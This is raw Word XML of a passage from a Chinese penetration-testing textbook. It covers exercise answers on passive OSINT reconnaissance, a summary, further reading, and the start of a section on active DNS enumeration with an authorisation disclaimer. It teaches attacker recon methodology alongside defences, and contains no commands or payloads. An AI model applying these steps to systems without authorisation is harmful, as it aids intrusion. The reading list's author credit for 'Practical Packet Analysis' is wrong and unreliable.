      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对于第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题，考虑日志留存和归因难度的差异。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对于第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题，尝试将信息源与攻击链后续阶段的利用方式关联起来思考。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对于第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题，CT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的核心安全属性是“不可删除”和“可公开审计”——这正是攻防两面性的来源。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对于第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题，参考“防御对照框”中的措施，并结合“攻击者视角前置”的思维模式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答要点</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被动侦察不直接与目标系统交互（使用第三方公共数据），不留痕于目标日志，归因困难；主动侦察涉及直接发包到目标网络，会留下</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址和时间戳日志，可被检测和溯源。攻击者优先被动侦察是因为：在不惊动防御方的前提下，初步构建攻击面地图，为后续精确的主动侦察缩小范围、降低暴露风险。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. ① </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">WHOIS：域名注册人、联系方式、DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器信息。②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录：A/AAAA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">揭示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP，MX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">揭示邮件基础设施，TXT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SPF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可能泄露内部网段。③</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志：历史</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">证书中包含的子域名称。④</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">搜索引擎</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Dorking：搜索索引中的敏感文件、目录列表、配置文件片段。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. CT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志的公开、不可篡改、可审计特性，允许防御者监控是否有未授权的本组织证书被签发（检测</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被入侵），同时也允许攻击者发现组织所有曾获得证书的子域。攻防双方都在利用同一个安全基础设施的透明性特质——这正是安全透明机制的固有属性：它让好人能审计坏人，也让坏人能观察好人。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">源头治理：启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WHOIS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隐私保护、使用通配符证书、审查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SPF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录、推行代码仓库</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Secrets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Scanning、清理暴露文件。持续监控：通过被动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志监控资产变更、设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Google </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Alerts、定期执行模拟</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OSINT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">演练、将外部暴露面数据集成到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">工作流。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">迁移任务</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">选择一个授权的实验目标（可以是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HackTheBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的起始点靶机，或读者自有实验域）。使用本节所授命令执行一轮完整的被动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OSINT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信息收集，记录所有发现：WHOIS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">暴露了什么？DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录有哪些？CT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志能发现多少子域？搜索引擎</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dorking </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是否发现了可访问的公开文件？将发现结果整理为一张攻击面地图，并思考：如果这是一次真实授权渗透测试，下一步你会针对哪些资产发起主动侦察？为什么？</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="84"/>
    <w:bookmarkStart w:id="85" w:name="小结-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被动侦察（Passive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnaissance）的核心特征是不直接与目标系统发生网络交互，以第三方公开数据为信息源，因此在目标日志中不留痕迹。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OSINT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的关键信息源包括：WHOIS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">域名注册信息、DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录与被动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据库、证书透明（CT）日志、搜索引擎索引（Google</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Dorking）、公开代码仓库（GitHub/GitLab）、网络空间搜索引擎（Shodan/Censys）等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者通过关联发散（Pivoting）方法，将不同信息源中获得的碎片信息串联起来，逐步构建目标的攻击面全景图，为后续的主动侦察和精确打击奠定基础。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御方的有效应对需同时结合源头治理（减少不必要的信息暴露）和持续监控（以攻击者视角审查自身数字足迹），并将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OSINT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">纳入暴露面管理（ASM）的常态化流程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被动侦察手段本身使用公开合法的服务，其攻防两面性恰恰揭示了一个核心安全原则：安全透明机制（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志）在增强防御审计能力的同时，也为攻击者提供了观察窗口——这是所有防御策略在设计时就需要考量的固有张力。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="85"/>
    <w:bookmarkStart w:id="92" w:name="延伸阅读-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Testing Guide v4/v5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Information Gathering </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章节。该指南为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用渗透测试提供了信息收集阶段的系统化方法框架，包含详细的信息源清单和检索策略。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Georgia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Weidman，《Penetration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Testing: A Hands-On Introduction to Hacking》</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">作者在信息收集章节中用实际的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OSINT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">工具链案例展示从零构建攻击面地图的完整过程，适合初学者建立端到端的侦察思维。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Michael </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bazzell，《Open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Source Intelligence Techniques》</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">当前市面上最全面的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OSINT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">方法论专著，覆盖社交网络、搜索引擎、数据聚合等广泛的信息源，提供了大量可操作的搜索语法和策略。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PaulSanders，《Practical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Packet Analysis》</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">虽以数据包分析为主题，但其前几章对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议的细致讲解对于理解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在侦察中的作用非常有帮助。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Reconnaissance </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">战术（TA0043）。该框架将攻击者的侦察技术进行了结构化分类，包括主动扫描、被动扫描、收集受害者身份信息等子技术，是理解攻击杀伤链第一阶段的全行业参考标准。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="86" w:name="主动侦察与-dns-枚举习题小结延伸"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主动侦察与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">枚举·习题·小结·延伸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主动侦察与被动侦察的本质区别在于，侦察方是否与目标系统发生直接的、可被日志记录的交互。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">枚举这一关键环节中，攻击者从被动地收集第三方公开数据（如证书透明日志、WHOIS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">历史记录等，详见</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节），转变为直接向目标的权威域名服务器或解析器发起查询。这种转变的代价是行动暴露的风险急剧升高，但换来的却是攻击面的高保真测绘。本节将深入探讨</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主动枚举的两大核心技法——DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">区域传送与子域爆破，并严格遵循攻防对称原则，为每一种攻击手法配备相应的检测与防御方案。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所有的命令示例与技术讨论，均严格限定用于读者自建的隔离实验室环境（如由虚拟机组成的虚拟网络）、官方授权的渗透测试平台（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HackTheBox、TryHackMe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等靶场）或持有书面授权的目标系统。实验网络必须与生产网络及公网物理或逻辑隔离。对任何未获得明确书面授权的目标系统执行本节描述的操作，均属违法行为。读者应始终遵守《中华人民共和国网络安全法》等相关法律法规。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="86"/>
    <w:bookmarkStart w:id="87" w:name="主动-dns-侦察的动机从听到问"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">侦察的动机：从“听”到“问”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节所描述的被动侦察阶段，防御者几乎无法感知攻击者的存在，因为攻击者只是在“听”——查询属于第三方的公开数据库。然而，被动信息往往存在盲区，例如不完整的子域列表、过时的记录或缺乏关于内部网络结构的信息。主动侦察则转“听”为“问”，直接向目标系统发起查询。对于攻击者而言，这是一个高风险、高回报的步骤，目的是获取目标最精确的“网络地图”。对于防御者而言，任何异常的、针对其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器的直接探测，都是攻击即将来临的前兆信号，是蓝队进行早期预警的关键情报源。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="87"/>
    <w:bookmarkStart w:id="88" w:name="dns-区域传送攻击"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.2 DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">区域传送攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理直觉与前提假设</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r>
